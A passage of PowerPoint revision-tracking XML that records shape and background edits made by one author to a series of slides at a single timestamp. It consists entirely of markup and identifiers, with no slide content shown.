        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="885769282" sldId="448"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="885769282" sldId="448"/>
            <ac:spMk id="2" creationId="{55BC7A17-F7FD-4ED9-B28C-0360B33418C6}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="885769282" sldId="448"/>
            <ac:spMk id="3" creationId="{2A4B2924-F067-41C8-BC2B-09E419359318}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="642498189" sldId="449"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="642498189" sldId="449"/>
            <ac:spMk id="2" creationId="{44CA83E6-B589-4F80-99BA-A3A59C0AE61B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="642498189" sldId="449"/>
            <ac:spMk id="3" creationId="{0AE2539F-D898-4FF7-9062-D23B8994603F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="642498189" sldId="449"/>
            <ac:spMk id="4" creationId="{E25DD15C-3AE3-427C-BBE6-5709CE49E2AB}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="205001677" sldId="450"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="205001677" sldId="450"/>
            <ac:spMk id="2" creationId="{0EB53B75-31A4-48E0-9D83-A16029516C76}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="205001677" sldId="450"/>
            <ac:spMk id="3" creationId="{2F258E1D-DFB0-476D-9BD8-D4F3F1DFE5FC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="205001677" sldId="450"/>
            <ac:spMk id="4" creationId="{E9F090C1-EC00-488D-A8AD-3EC3FE7A1149}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4215954891" sldId="451"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4215954891" sldId="451"/>
            <ac:spMk id="2" creationId="{AF306137-6A75-4B1B-9FAC-1573AFD234FE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4215954891" sldId="451"/>
            <ac:spMk id="3" creationId="{691779BA-3336-43B7-AD50-D1DE185D4B6C}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4263817369" sldId="452"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4263817369" sldId="452"/>
            <ac:spMk id="2" creationId="{6D5FD581-882E-42A9-A758-B1C0C1DD2D67}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4263817369" sldId="452"/>
            <ac:spMk id="3" creationId="{53A78011-4D4A-4C79-A6D9-DB32B0C3958C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4263817369" sldId="452"/>
            <ac:spMk id="4" creationId="{E86A4D17-C24B-49B7-8908-2CA7C5653268}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="61510333" sldId="453"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="61510333" sldId="453"/>
            <ac:spMk id="2" creationId="{3D9E7711-DEE4-486E-BFDD-8A3668367678}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="61510333" sldId="453"/>
            <ac:spMk id="3" creationId="{294642DA-1F86-424E-8094-424762CCE8F6}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4070574516" sldId="454"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4070574516" sldId="454"/>
            <ac:spMk id="2" creationId="{989C57B2-B4A0-4CD3-8235-ACC96DE71FE5}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4070574516" sldId="454"/>
            <ac:spMk id="3" creationId="{15DEFBA5-CB7F-4784-9F17-6814CF78AD01}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4070574516" sldId="454"/>
            <ac:spMk id="4" creationId="{9997D5AC-7DC4-43A2-B691-7BB7D01CCAF9}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2251621431" sldId="455"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2251621431" sldId="455"/>
            <ac:spMk id="2" creationId="{6E19EB92-3CCB-4F45-BD81-0EDA9769DF8C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2251621431" sldId="455"/>
            <ac:spMk id="3" creationId="{05583162-5679-4E5C-9C0A-BB060C28723E}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1103038572" sldId="456"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1103038572" sldId="456"/>
            <ac:spMk id="2" creationId="{13CDC2D7-2868-43F5-8FA3-14F9C4D1D1D2}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1103038572" sldId="456"/>
            <ac:spMk id="6" creationId="{957FDD44-C950-4BF7-B38E-9DA0831D27D0}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2997357596" sldId="457"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2997357596" sldId="457"/>
            <ac:spMk id="2" creationId="{9E96F12B-2A46-46E1-AFAD-D54A7228C9EF}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2997357596" sldId="457"/>
            <ac:spMk id="3" creationId="{640ABE76-7190-4FB2-B9F1-0C3A60BF6D87}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1173366032" sldId="458"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1173366032" sldId="458"/>
            <ac:spMk id="2" creationId="{E7D4EC67-24E3-48AC-A2EA-B93769CCB917}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1173366032" sldId="458"/>
            <ac:spMk id="3" creationId="{1A3D611B-71D0-4DD5-8955-419997B53B00}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1173366032" sldId="458"/>
            <ac:spMk id="4" creationId="{73589714-9931-4358-A64E-00901F990BA1}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3807950171" sldId="459"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3807950171" sldId="459"/>
            <ac:spMk id="2" creationId="{848C40E6-6DC4-457C-A79B-5CA2DDFDC9B4}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3807950171" sldId="459"/>
            <ac:spMk id="3" creationId="{42A05D52-69C3-4C69-A1BA-8FC3226106EF}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="788077467" sldId="578"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="788077467" sldId="578"/>
            <ac:spMk id="4" creationId="{A9B9FE6B-135A-41F1-A9F5-0262DB2A481E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="788077467" sldId="578"/>
            <ac:spMk id="5" creationId="{07CF2A8B-8673-424E-A595-B96F7DD54743}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="872358783" sldId="579"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="872358783" sldId="579"/>
            <ac:spMk id="5" creationId="{F06BD45B-73D7-43CA-8E1E-67EB7D31E3D9}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="872358783" sldId="579"/>
            <ac:spMk id="12" creationId="{D95CADBC-D601-4BD5-8E0D-8B10C622B1BF}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="872358783" sldId="579"/>
            <ac:spMk id="13" creationId="{887166BC-D46F-428C-B542-610AD4C06AD3}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1731914721" sldId="580"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1731914721" sldId="580"/>
            <ac:spMk id="2" creationId="{4DE5FCF3-F889-467A-BA25-5B62C7062178}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1731914721" sldId="580"/>
            <ac:spMk id="3" creationId="{CD1824EA-180C-4622-AE7E-709B49D7CDD5}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1731914721" sldId="580"/>
            <ac:spMk id="4" creationId="{78265284-BA9B-41D9-A9CC-DE888D9B950D}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="757040133" sldId="581"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="757040133" sldId="581"/>
            <ac:spMk id="2" creationId="{A4A32DC7-EC91-4475-B616-50E477BE0859}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="757040133" sldId="581"/>
            <ac:spMk id="3" creationId="{114EFDD5-155B-4470-8182-7FB2EF6978A4}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="757040133" sldId="581"/>
            <ac:spMk id="4" creationId="{5421A1A9-0A8F-4BFC-ACF7-D699E74599A0}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3791197359" sldId="582"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3791197359" sldId="582"/>
            <ac:spMk id="2" creationId="{5F29A75E-3A2E-424C-894E-D07420554DA4}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3791197359" sldId="582"/>
            <ac:spMk id="3" creationId="{BFA7967A-92B2-404B-ADC0-77B4357AB5FD}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3083242916" sldId="583"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3083242916" sldId="583"/>
            <ac:spMk id="2" creationId="{FE40ACE5-B3E9-4922-9259-6A009AE73316}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3083242916" sldId="583"/>
            <ac:spMk id="3" creationId="{0A108BD0-5376-4697-8AB7-2090EC8EB3FB}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3083242916" sldId="583"/>
            <ac:spMk id="4" creationId="{1915E9A3-9F8F-4A6F-B7AC-63455839FD62}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp setBg">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:33:43.008" v="136"/>
